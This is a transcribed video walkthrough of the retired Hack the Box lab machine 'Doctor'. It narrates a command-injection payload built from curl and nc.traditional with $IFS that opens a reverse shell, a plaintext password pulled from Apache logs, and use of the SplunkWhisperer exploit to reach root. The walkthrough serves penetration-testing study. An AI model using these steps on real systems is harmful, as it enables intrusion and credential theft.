Here we are and welcome back again. Today I'm going to tackle down another machine from Hack the Box. The machine name is Doctor, and by the time I solved the machine, it was in the active state. Now, at the moment you are watching the video, it has been moved to the retired state, right? So you can find it here now, right, at the time of this date. So let's get started. So basically I have scanned the box. Where is it? Oh, so the scan has, let me invoke the scan again. Sudo nmap c-a. Anyway, while the scan is running, we have to add two entries to the host file, doctor.htp and doctors with s.htp. Both these domains refer to the same IP, which is IP of the machine, right? So basically, if you open doctor.htp here, we have a regular clinic page. We can see different sections on the page, and there's many options here we can check. We go down, we have the footer. Okay, let's go up. Normally, we will explore everything here. So you go to departments, we check out the components the page is running on. You have contact us. You can contact us. So here we need to find some forms. We have the subscribe letter, but it is less likely that we will find something here. So we have the services page. So there are not so many options here. We can see no input forms, nothing like that. If you go to the messaging service, which is what actually it's wise to view the page source and understand if we can find the platform the page is running on, or it has been coded from scratch. So in the view page source, we can't see anything values. Here we can see link back to color. Okay, right. Now, if you go to the other page, we can see what seems to be a messaging service between doctors. So doctors can log in here and they can message each other, right? Okay. So here, what we can do first, we can try to do SQL injection, right, in order to get admin access. But unfortunately, that's not the way the machine is solved. We're going to click on the register and review type username, email. Just type dummy data. It works. Okay. Password. Sign up. Okay. Now we can log in. Okay. Now it works. We have this one weird, right? We can click on new message, right? We see we can type the title of the message and the contents. Account, my account, supposed to be a doctor, although I'm a biomedical engineer, but I'm not a doctor. So a new message here, we can see title and content. So we can, here we have input form, input box whatsoever. So here is our playground, normally for all kinds of application attacks, XSS, SQL injection, cross-site scripting, CSRF, whatsoever. So if you can click here, inspect, let's inspect the form and find out what's in there. So here, form, expand this, the title, the content. Okay, now let's click view page source. Right. Nothing seems to be remarkable here. Let's view the page source of the account. So we see we have a CSRF token. And this is the value of the token assigned to my account to prevent from CSRF attacks. Option JavaScript. Okay, let's go back here and a new message. So if you type here something like hi, new doctor here, post, new doctor here. Okay, to understand this more, let's fire up Burp Suite here. Hi, new doctor here again. So post. Okay, let's see here. So this is the request session. We have the session cookie here. Hi, and the new doctor here. Post. Okay, let's intercept the response. Forward. So this is the response we received from the backend. Okay. Right. So these are my messages actually. Okay. Let's go back and see what we can do here. So basically, I type hi, and here we input some kind of payload, either in the title field or in the content. So I have the content field and the title field. The one that worked for me is the content one. So if you put here some payload for reverse shell or whatsoever, it's going to work. So there's no input validation. It will be executed on in the backend of the server, and it will connect back to us. Now the options are not too miscellaneous. We have limited options when it comes to what kind of payload we need to use here. So basically, since this is seems to be running on, so here if you go back to nmap scan, this is the nmap scan of the box. It has finished. You can see we have 2280 running on Apache, and we have the secret messaging login, and we have another service running on port 8089 Splunk. This comes later, but let's first understand what we will do with this doctor's platform. Okay, so here sometimes we put some kind of payloads like one-liner reverse shell, one-liner PHP, whatsoever, but this kind of stuff works so if you go back to the nmap scan, we see here it's finished, by the way. Now we have 2280, 8089. This is the things that we are examining right now, and we have a service running on port 8089. So here, let's examine this first. Doctor.htp 889. Nope. Okay, let me try with the IP. We still get purpose suite error, connection resets. Okay, this will come later, no problem, we can examine that later. Okay, now what we need to do here. So basically we have many options, as I said. We can try to get a reverse shell connecting back to us either by manipulating the content field or the title field. And as I said, the one that worked is the content field. So what kind of payload, what kind of thing we need to put here? Okay, so basically, since this is a box, right? So if you go back to new messages here, let's type a new message. Hi again. Seems to need to log in again. This is the end of the night, and you are preventing me from logging in. So hilarious. Register. 2. "20 minutes." Okay, so here let's type again hi and examine the message more. So hi. Let's go back and type hi, and here we type something like script, right? And here we type alert, hi, and we close. So it hasn't been executed. Let's type something like other than script for cross-site scripting. We can choose a PHP payload. So here if we type PHP system, and we get here. Right. So here this has been executed as well. So we try something else. If we try some other command like I don't know, pwd, no. Okay. Curl. Okay. Let's go back here. This is other nmap scan. Let me open new tab. So Python okay. And try to connect to my machine. And my IP 16. Oh, so we see here it was trying to connect to us, right? Okay, let's go back and get this, or use the shell execution function in PHP. Maybe we can try to invoke some reverse shell. So if we go back here, let's try with something like PHP execute. Here we type bin dash. All right. Right, and the port will be 4546 0. Now I'm going to look for the right character, which is different because I'm running my keyboard on a different layout. Okay, now one. All right, so close that, nc-ldp 4555. And it didn't work. Oh, it's 4546. Let's go back. So this didn't work with the PHP. Let's go back and try with curl. Maybe with curl it's gonna work. So here I'm gonna use the same port, but I'm gonna use curl instead. 10 my IP. The port is 4546. Right. So here we need to invoke something. So previously, when we executed curl, it connected to our machine, right? Like it connected to our web server, running web server. But in this case, I'm connecting to a different port, and I need to specify what I need to run, right? So here, I'm going to type $, and then we're going to specify what is the command. So most probably, if you type just netcut, it's not going to work. So if you go to Google here and type Google, nc.traditional, so there are reverse shells with netcut traditional, right? Let me find it, not here. Okay. Okay, so here we have bin nc traditional IP on the port -e bin bash. Okay, let's go back. So here, nc.traditional, and then we're gonna close the $, ifs, then -e. We're gonna invoke bin bash, bin, and then we type again the $ifs, and then we type the IP, which is 10, 10, 14, 16. And let's just go back. Looking for traditional. Okay, not cut traditional. Okay, so nothing clear from here. I'm going to continue on my own. So here's the IP. I'm going to type semicolon, and then we type again $ifs, and then the port. The port is 4546. Okay, so it worked. So if I type ID here, so we are the web user. So next, we need to import some PTY shell, Python. So here, Python -c import pty.spawn, and then bin bash. Does this work? No. Let me take it again, and instead of bash, I type Python 3. Okay, no issues. We are in web home, ls-la. Okay, so for this machine, guys, you will find a string, a plain text password in the log files. in the log files of the Apache web server, right? So if you go back to home, we have two users, Sean and Web. The password is for the user Sean actually. You will find it in the log file. Okay, so basically here we have these directories, and I went to the home directory, I found user Sean, and we have web. So long story short, this box, there is a plain text password in the log files of the Apache web server. This plain text password will give you access to the user Sean. So basically, if you go to var log Apache 2, we have these access logs, right? The one that contains the password is the backup. So this one. But we can't just get the file because the file is too exhaustive, right? It contains too much. So here we can do cat backup, and here we type grep, something like password. Okay, so here as you can see, one of the users, which is most probably is Sean, has attempted to reset the password. And the email was something like guitar123, right? We can actually do the same for us. We can try to forget the password, and our password will appear in the logs. Okay, that is a flaw on the backend. So basically, we can use this password to log into Sean now. So cd who ls su and the password. Nope. Okay, so we are shown right now. Now, if you remember, we got, if you go back here, we have a service running on port 8089. So I think it's time to examine the service. You might say, what we have got from changing to user Sean? Actually, this user will help us exploit the Splunk server running on the port 8089. So let's go back. Let's go here. Let's just disable the purp suite. I don't like it. Yes. Settings. Go down. Networks, and here no proxy. Apply. Okay. Now we go to 10, 10, 10, 10, 209, 8089. It will work. Here it is running HTTPD, so we should be able to try this. Try S, and we couldn't. Okay, right. So now this service here, if we go to Google and type here the name of it, right? So the name is Splunk DHTTPD, right? So here we type, let's understand what it is. Splunk DHTTPD exploit. Remote code execution. Let's click on that. Splunk upload application execution, but I don't think it is the required one. Let's go back. Okay. So before looking for an exploit for Splunk, we need first understand what it is, right? So Splunk is our department knows that Splunk is some kind of SIEM solution, right, for enterprise security and fighting cyber attacks, which is a product of Splunk, right? They have other products for developer operations and IT. So this Splunk stuff running on this machine as a service. But for what is the purpose of that? We couldn't identify, we couldn't access it actually. We can try to netcut on this service, but I don't think it's deployed on netcut, right? Okay. Now first let's find the exploit for this. So Splunk exploit, and let's see if we have something on GitHub. So I have many exploits, but of course not all of them are working. If you click on this one, Splunk Whisperer, we have a tool which is the one that worked. Local privilege escalation or remote code execution through Splunk Universal Forwarder misconfigurations. You can understand more about this by going to this blog. You may have deployed Splunk Universal Forwarders on your systems to forward your SIEM, but what if they are not properly secured and could be hijacked? So it is exploiting the Splunk Universal Forwarders. I haven't tried this service. So here's the testing for that. Download Splunk for free. Okay. Local system. Right. So here's the proof of concept on Splunk. So instead of running Splunk, they are running the calculator, and here as you can see the Splunk Whisperer. And here's the exploitation of this. Oh, this is the recommendations. I'm sorry. So it seems like the box is running the Splunk Universal Forwarder to forward whatever it's forwarding to the Splunk SIEM as it's explained here, right? So it is forwarding something, right? To forward, so here deploy Splunk Universal Forwarders on your systems to forward to your SIEM. So this application here is running on the box, I guess. So what we are going to exploit, this one, which is running on port 8089 by using the Splunk Whisperer. So we take this and let's see here. Okay, open a new tab, or let's view it from here. Split view. Okay. Sudo git clone, and we type the IP, the URL. Right, ls. So here we have Splunk. Okay, cd Splunk. This is the one that we're gonna run is spy Splunk Whisperer. If we're running that, let's go to the exploit page and understand how it works. So we click on that, and here we have the options. So we run this, right, and we provide the following options. So let's run it, but first we need a local port we listen on in order to make this running. Sudo nc-lnvp 4547. Okay. Now, Python, no, not here. So we are here, Python. We put spy. Okay. Now, we define the options, right? I think we need to go, this is directory actually. So the file is this one, or the exploit. So Python, here, spy, Splunk, Whisperer, remote. Okay, now the options are, we have that-host. The host is it is the target host, which is 10, 10, 10, 20, 20 something. Let me get the IP. 9. Okay. 9. Right. And then dash lhost, which is your IP address, 10, 10, 14, 16. Dash username, because this exploit requires an authenticated access. That's why we extracted the password of the user Sean here. So the username is Sean, and the password is guitar. And then the payload. We specify what is it we want to execute, which is of course netcut to connect back to our listener. So here we're going to type code nc.traditional. Right, and then we define the bin bash, bin bash, and here we type the IP address of our machine, 10, 10, 14, 16, and then we type the port, 4547, and then we close the code, and it should run. Now model name requests. I think we should run this on Python 3. Okay, so we got here the reversal. If we type ID, and you are the root user, go to root, ls, and here is your root flag. Cat it and find your flag. So that was it. Not so difficult. All we had to do here is to understand how things work, right? What was that? Let me click on new. Okay, it's only the messaging service that was vulnerable. So basically, we were able to execute payloads in the fields. That all the time we look for fields in any web page or in a web application in order to execute our payloads. And this time, the curl that connected back to our machine worked. And then we were able to find a plaintext password in the logs file, which is something, a fault on the backend. And then we use this password to actually to make it usable in another exploit, which is was for on Splunk actually. Okay, so that was it. I hope you find it helpful, and we'll see you in the next video.